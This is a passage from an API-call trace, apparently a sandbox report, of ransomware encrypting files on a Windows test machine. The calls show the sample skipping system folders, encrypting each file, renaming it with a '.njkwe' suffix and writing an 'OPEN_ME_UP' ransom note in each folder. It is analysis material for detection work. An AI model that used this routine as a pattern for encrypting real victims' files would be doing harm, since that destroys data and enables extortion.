SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.987] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.987] GetProcessHeap () returned 0xbe0000 [0060.987] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.987] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.987] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.987] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.987] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.987] CloseHandle (hObject=0x42c) returned 1 [0060.988] GetProcessHeap () returned 0xbe0000 [0060.988] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.988] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.989] GetProcessHeap () returned 0xbe0000 [0060.989] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.989] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.989] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0060.989] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.989] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1033\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.989] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.990] CloseHandle (hObject=0x428) returned 1 [0060.990] GetProcessHeap () returned 0xbe0000 [0060.990] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.990] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1035", cAlternateFileName="")) returned 1 [0060.990] lstrcmpiW (lpString1="1035", lpString2="Windows") returned -1 [0060.990] lstrcmpiW (lpString1="1035", lpString2="$Recycle.bin") returned 1 [0060.990] lstrcmpiW (lpString1="1035", lpString2="System Volume Information") returned -1 [0060.990] lstrcmpiW (lpString1="1035", lpString2="Program Files") returned -1 [0060.990] lstrcmpiW (lpString1="1035", lpString2="Program Files (x86)") returned -1 [0060.990] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035") returned 30 [0060.990] lstrcmpW (lpString1="1035", lpString2=".") returned 1 [0060.990] lstrcmpW (lpString1="1035", lpString2="..") returned 1 [0060.990] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.990] GetProcessHeap () returned 0xbe0000 [0060.991] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.991] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\*") returned 32 [0060.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0060.991] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.991] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.991] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.991] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.991] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.991] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\.") returned 32 [0060.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.991] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.991] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.991] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.991] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.991] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.991] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.991] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\..") returned 33 [0060.991] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.991] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.991] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.991] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.991] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.991] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.991] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.991] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.991] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 39 [0060.991] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.991] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.991] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.992] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.992] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.992] GetTickCount () returned 0x114fadc [0060.992] GetTickCount () returned 0x114fadc [0060.992] GetTickCount () returned 0x114fadc [0060.992] GetTickCount () returned 0x114fadc [0060.992] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.992] GetProcessHeap () returned 0xbe0000 [0060.992] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.992] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xe76, lpOverlapped=0x0) returned 1 [0060.993] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff18a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.993] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xe76, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xe76, lpOverlapped=0x0) returned 1 [0060.993] GetProcessHeap () returned 0xbe0000 [0060.993] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.994] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.994] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.994] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.994] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.994] CloseHandle (hObject=0x42c) returned 1 [0060.995] GetProcessHeap () returned 0xbe0000 [0060.995] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.995] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.997] GetProcessHeap () returned 0xbe0000 [0060.997] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.997] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.997] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.997] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.997] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.997] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.997] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.997] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 48 [0060.997] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.997] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.997] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.997] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.997] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.997] GetTickCount () returned 0x114fadc [0060.997] GetTickCount () returned 0x114fadc [0060.997] GetTickCount () returned 0x114fadc [0060.997] GetTickCount () returned 0x114fadc [0060.997] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.997] GetProcessHeap () returned 0xbe0000 [0060.997] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.997] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.999] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.999] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.999] GetProcessHeap () returned 0xbe0000 [0060.999] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.999] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.999] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.000] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.000] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.000] CloseHandle (hObject=0x42c) returned 1 [0061.002] GetProcessHeap () returned 0xbe0000 [0061.002] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.002] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.118] GetProcessHeap () returned 0xbe0000 [0061.118] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.118] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.118] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.118] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.118] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.118] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.118] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.118] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 49 [0061.118] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.118] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.119] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.119] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.119] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.119] GetTickCount () returned 0x114fb59 [0061.119] GetTickCount () returned 0x114fb59 [0061.119] GetTickCount () returned 0x114fb59 [0061.119] GetTickCount () returned 0x114fb59 [0061.119] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.119] GetProcessHeap () returned 0xbe0000 [0061.119] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.119] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.121] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.121] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.121] GetProcessHeap () returned 0xbe0000 [0061.121] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.121] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.121] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.121] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.122] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.122] CloseHandle (hObject=0x42c) returned 1 [0061.123] GetProcessHeap () returned 0xbe0000 [0061.123] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.123] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.124] GetProcessHeap () returned 0xbe0000 [0061.124] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.124] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.124] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0061.124] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.124] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1035\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.124] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.125] CloseHandle (hObject=0x428) returned 1 [0061.125] GetProcessHeap () returned 0xbe0000 [0061.125] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.125] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1036", cAlternateFileName="")) returned 1 [0061.125] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0061.125] 